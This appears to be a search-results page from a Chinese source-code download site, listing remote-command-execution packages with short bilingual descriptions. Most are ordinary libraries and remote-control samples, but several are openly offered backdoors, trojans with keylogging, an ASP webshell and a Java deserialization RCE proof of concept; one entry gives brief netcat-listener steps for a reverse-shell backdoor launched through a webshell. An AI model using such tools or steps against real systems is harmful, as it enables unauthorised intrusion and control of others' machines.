搜索资源列表
binder2
- 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参
myserver000000000
- asp远程WEB服务器管理 功能:服务器信息、文件管理、文件批量上传、数据库管理、执行DOS命令 仅一个asp文件,自行修改登录密码password=\"123456\"-asp remote Web server management functions : information servers, document management, file upload batch, database management and implementation of a DOS comman
SqlToolZ_Src
- SQL远程执行命令和上传文件原代码.用于sql服务器远程控制.-Remote SQL implementation of orders and upload documents original code. Sql server for the remote control.
vc_client_server
- 简易的远程控制代码. 两个执行文件.服务端为server,客户端为Client.现在另一台机器上运行server.exe,在自己的电脑上运行Client.exe,然后输入DOS命令,即可显示另一台机器的运行此命令的结果.简单的不能再简单了,请大家不要见笑,供学习之用.注意要更改CLIENT源文件中的IP.
remotecontrolserver
- /*****远程控制服务器端源代码 本代码的作用和他的那段代码有些类似之处。 不过主要作用是接受并执行客户端的指令 实现起来比他的繁琐一些。 实现功能如下: 从配置文件中读取配置端口和用户名和密码 限制登录ip和登录连接数 可选择采用SSL通讯或者明文通信 接受客户端之类指令。 执行系统命令或者传送文件。-/***** remote control server source code of the role and his code during some similarities. Howe
TERM 终端仿真器 1.0
- 一 程序的整体结构1 拨号功能,自动响应功能。(能使用ATDT命令拨号,使用Ctrl-D退出联机状态)。2 执行调制解调器命令。3 仿真终端功能:在线方式可进行联机通信,TTY终端仿真,加载驱动程序后可进行VT100终端仿真。4 文件服务功能: 文本文件的传输,二进制文件的传输,文本文件和二进制文件的写盘功能。文本文件的阅览和简单编辑功能。5 终端服务功能: UNIX主机上运行的具有菜单驱动的终端服务程序,客户机可通过终端仿真器访问远程机(Remote machine)资源。6 访问本地机资源:
远程连接
- 进行TELNET到远程主机,并且执行命令
Cmder 远程控制的软件
- 一个远程控制的软件,目前只有执行cmd命令,开关机,显示消息框等的操作-A remote control software, currently functions include excute cmd command, shutdown computer or show messagebox
1.8
- 用VC编译的简单的反向连接后门,客户端和服务端使用的端口可以自动设置,还设置了几个简单的远程登录后可执行的命令行-VC compiled easy to use reverse connection back door, the client and server use the port can be automatically set, but also set up a remote log in a few simple command line executable after
RemoteControl
- C#实现的远程控制代码,除远程桌面以外,也支持远程命令的执行.-C# Remote Control Code Sample.
client
- VB 远程木马,反向连接,主控端可以生成有配置信息的服务端,可以执行DOS命令-VB remote Trojans, reverse connection, the host can generate are the server configuration information, you can run DOS commands
libssh-0.4.6.tar
- libssh 是一个用以访问SSH服务的C语言开发包,通过它可以执行远程命令、文件传输,同时为远程的程序提供安全的传输通道。它对 SFTP 的实现使得远程传输文件变得非常简单,除了OpenSSL所提供的一些加密包(libcrypt、libgcrypt)外,libssh 并不需要更多的第三方包的支持。 -libssh is an SSH service to access C language development kit, which you can execute remote comm
remotecontrol
- 实现一个简单远程监控软件,采用Windows Socket(或Java Socket)编程。采用C/S架构。(1)能够远程监控一台主机,显示主机屏幕内容,能远程关机(2)能远程下载或上传文件(3)能远程执行一些DOS命令(4)能远程运行一些可执行命令。 -Implement a simple remote control software, using Windows Socket (or Java Socket) programming. By C/S architecture. (1)
linux-web
- ? 描述网络和网络互联,解释它们的作用 ? 简要讨论TCP/IP协议栈,IP地址,协议端口,因特网服务和应用 ? 解释什么是客户/服务器软件模型,它如何工作 ? 讨论各种用于电子通信,远程登录,文件传输,远程命令执行,以及状态报告的网络软件工具 ? 简要描述安全shell ? 覆盖如下命令和原语:finger, ftp, ifconfig, nslookup, ping, rcp, rlogin, rsh, ruptime, rusers, rwho, talk, telne
CSharp_Remote_Cmd_Exec
- C#开发的简易的远程命令执行系统,适合网络编程人员参考。-C# developers a simple remote command execution system, suitable for network programming reference.
NsDoor
- 木马程序源码,使用C++开发,包括木马客户端和服务器端,具有进程管理,文件管理,远程命令执行,远程桌面监控,键盘监控等功能-Trojan program source code, use C++ developers, including the Trojans client and server-side, process management, document management, remote command execution, remote desktop monitor, key
libssh2-1.2.1.tar
- libssh 是一个用以访问SSH服务的C语言开发包,通过它可以执行远程命令、文件传输,同时为远程的程序提供安全的传输通道。它对 SFTP 的实现使得远程传输文件变得非常简单,除了OpenSSL所提供的一些加密包(libcrypt、libgcrypt)外,libssh 并不需要更多的第三方包的支持。 -libssh is an SSH service to access C language development kit, which you can execute remote comm
linux
- 远程终端管理系统实现了一个mini 执行远程命令 的功能。该系统采用C/S架构,需要分别编写服务端与客户端程序。-Remote terminal management system realized the function of a mini remote command execution. The system USES C/S architecture, it is necessary to write the client and the server program, respect
lsd
- 此源码是远程控制系统,对远程计算机可以执行shell命令,能够注册用户进行聊天,群聊,单聊,留言都可以,终端运行的,对初学者来说帮助很大-This source is a remote control system, the remote computer can execute shell commands, registered users can chat, group chat, single chat, message can be, terminal operation, very
Java_RCE_PoC
- java反序列化操作远程命令执行漏洞的PoC-deserialize java remote command execution vulnerability PoC